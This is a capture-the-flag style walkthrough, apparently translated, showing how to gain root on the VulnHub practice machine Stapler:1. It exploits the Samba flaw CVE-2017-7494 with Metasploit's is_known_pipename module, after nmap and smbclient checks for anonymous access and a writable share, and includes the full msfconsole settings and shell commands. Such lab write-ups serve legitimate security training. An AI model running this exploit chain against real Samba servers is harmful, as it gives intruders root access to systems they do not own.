[CVE-2017-7494] Using the Metasploit Framework, I tried to infiltrate Stapler:1 due to a vulnerability in Samba.

We will show you how to infiltrate "STAPLER:1" published by Staper on VULNHUB using the Metasploit Framework.
If you still have an environment with STAPLER:1, please refer to Build an environment with STAPLER:1 on VirtualBox on Windows!

What is Metasploit Framework?

The Metasploit Framework (hereinafter referred to as Metasploit) is a software developed mainly by Rapid7 for performing penetration testing.
Kali Linux is the most popular penetration testing framework in the world, as it is included as standard.

Invade Stapler:1 from Samba vulnerability

This time, we will infiltrate Stapler:1 using metasploit, which attacks the vulnerability of CVE -2017-7494

Check if the Stapler is on the same network.

Check if the Stapler is on the same network.
The command to check is "netdiscover".

netdiscover -r 192.168.2.0

It's OK as long as you can turn Currently scanning; Finished! and confirm that Samba is on the same network.

Scan services in Sparta

A tool called Sparta is used to scan services running on the target port and collect information.

Start Sparta with the command below.

sparta

apt install legion legion

You will see a screen similar to the one below.
Click "Click here to add host(s) to scope."

Enter your IP address and click Submit.

Click Submit to start the scan, so wait until nmap (stage5) is complete.
Once completed, you will be in the following state:

Identifying the version

In Sparta, you cannot specify the version of Samba, so we will use nmap to identify the version.

nmap -vvv -A -p 139 192.168.2.5

You can see that the version is "4.3.9-Ubuntu".

Check the attack module in metasproit

Check metasproit for attack modules for the version of Samba you identified.

When I searched, I found an attack module that corresponds to "CVE -2017-7494".

GitHub

metasploit-framework/documentation/modules/exploit/linux/samba/is_known_pipename.md at master · rapid… Metasploit Framework. Contribute to rapid7/metasploit-framework development by creating an account on GitHub.

Here you can find three conditions for a successful attack:

1. Valid credentials
2. Writeable folder in an accessible share
3. Server-side path of the writeable folder

Next, let's check to see if the conditions are met.

Check "Valid credentials"

Valid credentials meet the requirements if you do not need a password to access it.

smbclient -L 192.168.2.5 Enter WORKGROUP\hacklab's password:

Go to Samba with.
At this time, you will be asked for your password, but please do not enter it and press Enter.

This shows that the "Valid credentials" condition is met.

Check "Writeable folder in an accessible share"

Next, check the Writeable folder in an accessible share.
Writeable folder in an accessible share meets the requirements if there is an accessible, writeable shared folder.

Create a text file in an appropriate location. The contents are fine and there is no problem.

Since tmp often has no write restrictions, I'll try placing the file in tmp.

smbclient //192.168.2.5/tmp Enter WORKGROUP\hacklab's password:

put text.txt

This ensures that the write is successful, and the "Writeable folder in an accessible share" condition has also been met.

Check "Server-side path of the writeable folder"

Finally, check "Server-side path of the writeable folder".
Server-side path of the writeable folder meets the conditions if it is possible to check the server-side path of the writeable folder.

nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139 192.168.2.5

By doing the above,

You can see that Path is "C:\var\tmp". Since the other party is Linux, in reality, read it as "/var/tmp".
I've also found the path, so I also meet the condition "Server-side path of the writeable folder".

Set up exploit

Since all three conditions are met, let's actually use metasploit to attack.
The attack procedure is as described.

1. Start msfconsole
2. Do: use exploit/linux/samba/is_known_pipename
3. Do: set rhost [ip]
4. Do: set target [target #]
5. Do: exploit

First, start msfconsole.

msfconsole

Once it's up, run "use exploit/linux/samba/is_known_pipename".

use exploit/linux/samba/is_known_pipename

Now let's run show options and see.

show options

You can attack by specifying the item with Required set to yes and payload.

First, set up RHOSTS and RPORT.
Here, specify information about the target Samba.

set rhost 192.168.2.5 set rport 139

Next, check the available payloads.

show payloads

Set payload to cmd/unix/interact.

set payload cmd/unix/interact

This completes the exploit configuration.
Just to be sure, I'll check the show options.

In fact, it will invade

So let's actually break in.

Just run "run" while leaving exproit set.

run

If Command shell session 1 opened is displayed, you have access with root privileges.

If an encryption error occurs in msf6, please refer to the following as a reference.

set SMB::AlwaysEncrypt false set SMB::ProtocolVersion 1

Ben's IR Notes

Metasploit 6 SMB Encryption Error Fixing If prompted in MSF6 about the following SMB encryption error: Exploit failed: RubySMB::Error::EncryptionError Communication error with the remote host: Socket r…

Let's check the information.

id

pwd

ls -la

Start pty

It's fine to continue like this, but it will interfere with the lateral movement, such as not being able to SSH, so be sure to start pty.

Just run the following command:

python -c 'import pty; pty.spawn("/bin/sh")'

Check the flag

Now, let's check out the flag and finish it.

cd /root ls -la

Check the contents of flag.txt.

cat flag.txt

That's it!

lastly

This time, we tried to infiltrate Stapler:1 using the Metasploit Framework due to the vulnerability of CVE-2017-7494.

Stapler:1 has other ways to invade.
We also introduce other methods, so please refer to them.